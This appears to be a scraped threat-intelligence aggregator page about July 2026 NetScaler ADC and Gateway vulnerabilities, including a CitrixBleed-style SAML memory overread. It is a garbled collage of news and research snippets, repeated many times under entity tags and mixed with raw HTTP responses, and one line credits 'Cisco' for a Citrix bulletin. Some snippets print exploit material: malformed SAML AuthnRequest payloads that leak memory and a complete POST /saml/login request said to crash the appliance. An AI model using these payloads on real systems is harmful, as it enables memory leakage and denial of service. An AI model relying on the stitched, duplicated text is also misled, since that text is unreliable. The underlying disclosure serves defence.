Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a
organisation
Content-Type
HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src < 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action 'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
<html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script type="text/javascript" src="/vpn/resources.js"></script><script type="text/javascript" src="/vpn/init/redirection_body_resources.js"></script></head><body><span id="This object may be found "></span><a
organisation
NetScaler Gateway
Ravie Lakshmanan
Jul 01, 2026
Vulnerability / Enterprise Security
Citrix on Tuesday
released
security updates to address multiple flaws in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that could be exploited by an attacker to facilitate arbitrary file reads or trigger a denial-of-service (DoS) condition.
What Is Citrix NetScaler and NetScaler Gateway?
The high-severity flaw affects Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway devices that are configured as a
SAML
identity provider (IDP).
Citrix
published a security bulletin
Tuesday disclosing six vulnerabilities in NetScaler ADC and NetScaler Gateway appliances, including a high-severity memory disclosure flaw that researchers say belongs to a vulnerability class first identified in the 2023 incident known as
CitrixBleed
.
organisation
NetScaler ADC
Ravie Lakshmanan
Jul 01, 2026
Vulnerability / Enterprise Security
Citrix on Tuesday
released
security updates to address multiple flaws in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that could be exploited by an attacker to facilitate arbitrary file reads or trigger a denial-of-service (DoS) condition.
Citrix
published a security bulletin
Tuesday disclosing six vulnerabilities in NetScaler ADC and NetScaler Gateway appliances, including a high-severity memory disclosure flaw that researchers say belongs to a vulnerability class first identified in the 2023 incident known as
CitrixBleed
.
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Let’s dive in.
Related:
NIST Enrichment Reductions Impact CVE Coverage, Accuracy
Lupovis urged organizations to immediately upgrade to fixed versions of NetScaler ADC and Gateway, v. 14.1-72.61 or 13.1-63.18.
organisation
Vulnerability / Enterprise Security
Ravie Lakshmanan
Jul 01, 2026
Vulnerability / Enterprise Security
Citrix on Tuesday
released
security updates to address multiple flaws in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that could be exploited by an attacker to facilitate arbitrary file reads or trigger a denial-of-service (DoS) condition.
organisation
Citrix ADC
Ravie Lakshmanan
Jul 01, 2026
Vulnerability / Enterprise Security
Citrix on Tuesday
released
security updates to address multiple flaws in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that could be exploited by an attacker to facilitate arbitrary file reads or trigger a denial-of-service (DoS) condition.
organisation
DoS
Ravie Lakshmanan
Jul 01, 2026
Vulnerability / Enterprise Security
Citrix on Tuesday
released
security updates to address multiple flaws in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that could be exploited by an attacker to facilitate arbitrary file reads or trigger a denial-of-service (DoS) condition.
organisation
Groundhog Day fan
Well, if you’re here, you likely fit into one of the following categories:
A dear reader,
A group therapy accomplice
A Groundhog Day fan club member
Why?
organisation
Citrix NetScalers
Because we once again find ourselves talking about Citrix NetScalers.
organisation
NetScaler
Citrix patches a new NetScaler flaw with echoes of CitrixBleed.
Citrix NetScaler (formally rebranded, then un-rebranded, in the way that only enterprise networking vendors can truly pull off) is a family of application delivery controllers and VPN gateway appliances found in virtually every large enterprise network on the planet.
Another NetScaler security vulnerability in the vein of the infamous "CitrixBleed" flaw has come under attack, which could leak risky corporate information.
An insufficient input validation vulnerability leading to memory overread when TCP TimeStamp is enabled in TCP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
CVE-2026-13474
(CVSS score: 8.7) -
organisation
Citrix NetScaler
As many know, the term CitrixBleed now refers to not a single vulnerability, but an entire class of Memory Disclosure-esque vulnerabilities in Citrix NetScaler devices, many of which have played roles in breaches and incidents in recent memory.
"In practice, we found that by varying the request length, we could consistently squeeze a few bytes out of the server."
"However, what should be of concern is the bigger picture - the trend, which is very clearly suggesting that memory management continues to appear fragile within Citrix NetScaler appliances, to the extent that even accidentally misconfiguring an appliance can lead to the disclosure of leaked memory.
organisation
Preemptive Exposure Management
This research is a glimpse into the capabilities that power our Preemptive Exposure Management solution and get organizations ahead of inevitable in-the-wild exploitation: the
watchTowr Platform.
organisation
Citrix NetScaler Application
The high-severity flaw affects Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway devices that are configured as a
SAML
identity provider (IDP).
organisation
CVE-2026-13474
An insufficient input validation vulnerability leading to memory overread when TCP TimeStamp is enabled in TCP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
CVE-2026-13474
(CVSS score: 8.7) -
organisation
TimeStamp
An insufficient input validation vulnerability leading to memory overread when TCP TimeStamp is enabled in TCP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
CVE-2026-13474
(CVSS score: 8.7) -
organisation
TCP Profile
An insufficient input validation vulnerability leading to memory overread when TCP TimeStamp is enabled in TCP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
CVE-2026-13474
(CVSS score: 8.7) -
organisation
CS
An insufficient input validation vulnerability leading to memory overread when TCP TimeStamp is enabled in TCP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
CVE-2026-13474
(CVSS score: 8.7) -
organisation
SSL
NetScaler handles load balancing, SSL offloading, authentication, and remote access - and NetScaler Gateway specifically serves as the front door for thousands of organizations' remote access infrastructure.
organisation
NetScaler ADC FIPS
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Let’s dive in.
financial
14.1 NetScaler ADC
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Let’s dive in.
infrastructure
13.1 NetScaler ADC FIPS
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Let’s dive in.
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
14.1 FIPS NetScaler
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Let’s dive in.
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
14.1-72
Related:
NIST Enrichment Reductions Impact CVE Coverage, Accuracy
Lupovis urged organizations to immediately upgrade to fixed versions of NetScaler ADC and Gateway, v. 14.1-72.61 or 13.1-63.18.
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
13.1-63
Related:
NIST Enrichment Reductions Impact CVE Coverage, Accuracy
Lupovis urged organizations to immediately upgrade to fixed versions of NetScaler ADC and Gateway, v. 14.1-72.61 or 13.1-63.18.
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
13.1
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
14.1-FIPS
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
13.1-FIPS
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
13.1-NDcPP
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
infrastructure
13.1.37
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service configured on NetScaler
Patches for the security defects have been released in the following versions -
NetScaler ADC and NetScaler Gateway 14.1-72.61 and later releases
NetScaler ADC and NetScaler Gateway 13.1-63.18 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.272 and later releases of 13.1-FIPS and 13.1-NDcPP
As for CVE-2026-13474, customers are also advised to update their configurations by modifying the Http2SmallWndTimeout parameter, which controls the timeout (in seconds) for HTTP/2 small‑window stalled streams -
For appliances using HTTP Strict Profiles, this parameter defaults to 30 seconds.
organisation
the Citrix NetScaler
Rare Vulnerabilities
It was a late night in Pallet Town, and we, the intrepid hero, were searching for rare P
okémon
vulnerabilities in the long grass of the Citrix NetScaler.
organisation
XML
Anyone familiar with SAML will know that clients kick off authentication by submitting a base64-encoded XML document to an endpoint like this.
WatchTowr Labs
published full technical details
of the flaw, which XML parser, and a PoC exploit on the same day Citrix disclosed and patched the flaw.
organisation
AuthnRequest
Buried inside that XML document is an
AuthnRequest
, which describes everything the identity provider needs to know, including the issuer, destination, timestamps, and a handful of other attributes.
organisation
ForceAuthn
NetScaler successfully extracts the
ID
and
AssertionConsumerServiceURL
attributes, while
ForceAuthn
falls back to its default value.
organisation
POST
Once again, we base64-encode the document and POST it to
/saml/login
:
organisation
Issuer
The
ID
field now contains
<saml:Issuer
, and the
ACSURL
field has similarly consumed data well beyond the intended attribute value.
organisation
ID
It must contain either an
AssertionConsumerServiceURL=
or
ID
attribute terminated by a newline, or not terminated at all.
organisation
Issuer.|
00000070 6d 6c 3a 49 73 73 75 65 72 00 |ml:Issuer.|
Finally!
organisation
External Attack Surface Management
The
watchTowr Platform
combines
External Attack Surface Management
and
Continuous Automated Red Teaming
to test your defenses against the vulnerabilities and techniques that matter: the ones real attackers are actually exploiting.
organisation
CVSS
The company rated the overall bulletin severity as high and assigned
CVSS
scores ranging from 6.9 to 8.8 across the six CVEs.
organisation
NetScaler Vulnerability
NetScaler Vulnerability Under Attack.
organisation
PoC
At least one vendor has reported attacks against the latest NetScaler vulnerability, following the publication of a proof-of-concept (PoC) exploit.
organisation
IBM Bets
IBM Bets $5B It Can Fix Them.
organisation
AAA
A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial-of-service when the appliance is configured as a Gateway or an AAA virtual server
CVE-2026-8655
(CVSS score: 8.8) - Multiple memory overflow vulnerabilities leading to unpredictable or erroneous behavior and denial-of-service when NetScaler ADC is configured as an LB of type Oracle, a DNS Proxy, or a DNS recursive resolver deployment
CVE-2026-10816
(CVSS score: 7.7) - An external control of the file name of the path vulnerability leading to unauthenticated, arbitrary file read when access to NSIP, Cluster Management IP, or SNIP with management access is enabled
CVE-2026-10817
(CVSS score: 6.9) -
organisation
LB
A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial-of-service when the appliance is configured as a Gateway or an AAA virtual server
CVE-2026-8655
(CVSS score: 8.8) - Multiple memory overflow vulnerabilities leading to unpredictable or erroneous behavior and denial-of-service when NetScaler ADC is configured as an LB of type Oracle, a DNS Proxy, or a DNS recursive resolver deployment
CVE-2026-10816
(CVSS score: 7.7) - An external control of the file name of the path vulnerability leading to unauthenticated, arbitrary file read when access to NSIP, Cluster Management IP, or SNIP with management access is enabled
CVE-2026-10817
(CVSS score: 6.9) -
organisation
Oracle
A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial-of-service when the appliance is configured as a Gateway or an AAA virtual server
CVE-2026-8655
(CVSS score: 8.8) - Multiple memory overflow vulnerabilities leading to unpredictable or erroneous behavior and denial-of-service when NetScaler ADC is configured as an LB of type Oracle, a DNS Proxy, or a DNS recursive resolver deployment
CVE-2026-10816
(CVSS score: 7.7) - An external control of the file name of the path vulnerability leading to unauthenticated, arbitrary file read when access to NSIP, Cluster Management IP, or SNIP with management access is enabled
CVE-2026-10817
(CVSS score: 6.9) -
organisation
DNS
A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial-of-service when the appliance is configured as a Gateway or an AAA virtual server
CVE-2026-8655
(CVSS score: 8.8) - Multiple memory overflow vulnerabilities leading to unpredictable or erroneous behavior and denial-of-service when NetScaler ADC is configured as an LB of type Oracle, a DNS Proxy, or a DNS recursive resolver deployment
CVE-2026-10816
(CVSS score: 7.7) - An external control of the file name of the path vulnerability leading to unauthenticated, arbitrary file read when access to NSIP, Cluster Management IP, or SNIP with management access is enabled
CVE-2026-10817
(CVSS score: 6.9) -
organisation
NSIP
A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial-of-service when the appliance is configured as a Gateway or an AAA virtual server
CVE-2026-8655
(CVSS score: 8.8) - Multiple memory overflow vulnerabilities leading to unpredictable or erroneous behavior and denial-of-service when NetScaler ADC is configured as an LB of type Oracle, a DNS Proxy, or a DNS recursive resolver deployment
CVE-2026-10816
(CVSS score: 7.7) - An external control of the file name of the path vulnerability leading to unauthenticated, arbitrary file read when access to NSIP, Cluster Management IP, or SNIP with management access is enabled
CVE-2026-10817
(CVSS score: 6.9) -
organisation
Cluster Management IP
A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial-of-service when the appliance is configured as a Gateway or an AAA virtual server
CVE-2026-8655
(CVSS score: 8.8) - Multiple memory overflow vulnerabilities leading to unpredictable or erroneous behavior and denial-of-service when NetScaler ADC is configured as an LB of type Oracle, a DNS Proxy, or a DNS recursive resolver deployment
CVE-2026-10816
(CVSS score: 7.7) - An external control of the file name of the path vulnerability leading to unauthenticated, arbitrary file read when access to NSIP, Cluster Management IP, or SNIP with management access is enabled
CVE-2026-10817
(CVSS score: 6.9) -
organisation
XOR
The command to set this parameter is below -
set ns httpProfile <profile_name> -http2SmallWndTimeout <value_in_seconds>
Cisco credited Michael Tucker from the XOR team at JPMorgan Chase, Aliz Hammond of watchTowr, and Maxim Suhanov for reporting the vulnerabilities.
Along with Hammond, the bulletin credits Michael Tucker of the XOR team at JPMorgan Chase and Maxim Suhanov for finding the vulnerabilities.
organisation
JPMorgan Chase
The command to set this parameter is below -
set ns httpProfile <profile_name> -http2SmallWndTimeout <value_in_seconds>
Cisco credited Michael Tucker from the XOR team at JPMorgan Chase, Aliz Hammond of watchTowr, and Maxim Suhanov for reporting the vulnerabilities.
Along with Hammond, the bulletin credits Michael Tucker of the XOR team at JPMorgan Chase and Maxim Suhanov for finding the vulnerabilities.
organisation
Citrix
NetScaler
“Referencing what we wrote previously, because it is demonstrably evergreen: ‘However, what should be of concern is the bigger picture – the trend, which is very clearly suggesting that memory management continues to appear fragile within
Citrix
NetScaler appliances, to the extent that even accidentally misconfiguring an appliance can lead to the disclosure of leaked memory,’” Hammond wrote in the report.
organisation
TCP
Another concerns memory overread triggered through TCP timestamp handling.
Jul 01, 2026
Threat actors exploited a previously unknown vulnerability in Citrix's NetScaler product to gain unauthorized access.
July 3
Threat actors used a vulnerability in Citrix's NetScaler to target the vendor.
Click on any entity below to view its context and source!
industry
Media
In a post on social media platform X on July 3, the vendor said it has "seen a lot more exploitation."
Tactical Metrics
Metrics
infrastructure
2.0
Software Version
Click for context!
…ressively breaking things and observing how the parser responds:
<samlp:AuthnRequest
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
ID="_99d3e71118f42305e05acb14ad0bd917"
Version="2.0"…
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22>
<saml:Issuer>watchtowr</saml:Issuer>
</samlp:
…y></html>
With the log file… not being so coy:
AuthnReq start tag parsed, id=<22>, acs=<11 id=22>, forceAuth=<0>, binding=<Unknown>,
following data Version="2.0" AssertionConsumerServiceURL=11 id=22> <saml:Issuer>watchtowr</saml:Issuer> </samlp:
…ionConsumerServiceURL
and
ID
with newlines, and leave the opening
AuthnRequest
tag unclosed, we end up with the following request:
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=
id=
<saml:Issuer>watchtowr</saml:Issuer>
</samlp:
…generated log is far from boring:
AuthnReq start tag parsed, id=<<saml:Issuer>, acs=<id= <saml:Issuer>,
forceAuth=<0>, binding=<Unknown>, following data Version="2.0" AssertionConsumerServiceURL= id= <saml:Issuer>watchtowr</saml:Issuer> </samlp:
For example:
<samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22
</samlp:
AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL="22"
This yields a successful response - although the extracted details are incorrect:
AuthnReq start tag parsed, id=<>, acs=<22>, forceAuth=<0>, binding=<Unknown>
You might note tha…
AuthnRequest>
Version="2.0"
id="11"
AssertionConsumerServiceURL=
And in our favorite log…:
AuthnReq start tag parsed, id=<>, acs=<▒^M▒ᆳ▒="2.0" id="11"
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php</saml:Issuer>,
forceAuth=<0>, bindi…
Metrics
infrastructure
1.1
Software Version
…0:bindings:HTTP-POST"
AssertionConsumerServiceURL="<
<saml:Issuer><
<samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress" AllowCreate="true"/>
<samlp:RequestedAuthnContext Comparison="exact">
<saml:AuthnContextCl…
…s as simple as the following are enough to reliably crash the target system:
<samlp:AuthnRequest ID=
POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D
This request causes the
nsppe…
Metrics
infrastructure
Cursor
Affected Product
The result is delightful snippets like the following, taken from the code responsible for parsing XML attributes such as
foo="bar"
:
cursor = <some string input>
whitespaceCharList = 0x100002600;
//
Skip leading whitespace
for ( lookahead = (v32 + 28); ; lookahead++ )
{
ch = *cursor;
if ( ch > '=' )
break;
if ( !_
bittest64(&whitespaceCharList, ch) )
break;
++lookahead;
}
cursor = lookahead;
}
break;
}
++cursor;
}
//
== '"' )
{
terminator = ch;
first = *++cursor;
}
else
{
terminator = ' ';
first = ch;
}
if ( first == terminator )
return 0xE0002; //
scanPos = cursor;
while ( first !
if ( scanPos == cursor )
return 0xE0002; // the value is empty.
out->value_ptr = cursor;
out->value_len = scanPos - cursor;
The first thing that probably jumps out is the slightly odd-looking
_bittest64()
call.
Metrics
infrastructure
28
Skip Leading Whitespace
Skip leading whitespace
for ( lookahead = (v32 + 28); ; lookahead++ )
{
ch = *cursor;
if ( ch > '=' )
break;
if ( !_
Metrics
infrastructure
192.168.80
Software Version
…e as the following are enough to reliably crash the target system:
<samlp:AuthnRequest ID=
POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46
SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D
This request causes the
nsppe
process t…
Metrics
financial
14
Netscaler Adc
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC F…
Metrics
infrastructure
13
Netscaler Adc Fips
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC F…
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service conf…
Metrics
infrastructure
14
Fips Netscaler
Within their advisory, Citrix states the following products are affected:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC F…
A missing release of memory after effective lifetime vulnerability leading to denial-of-service via malformed HTTP/2 requests when HTTP/2 is enabled in the HTTP Profile and associated with the virtual server (of type LB, CS, VPN) or the service conf…
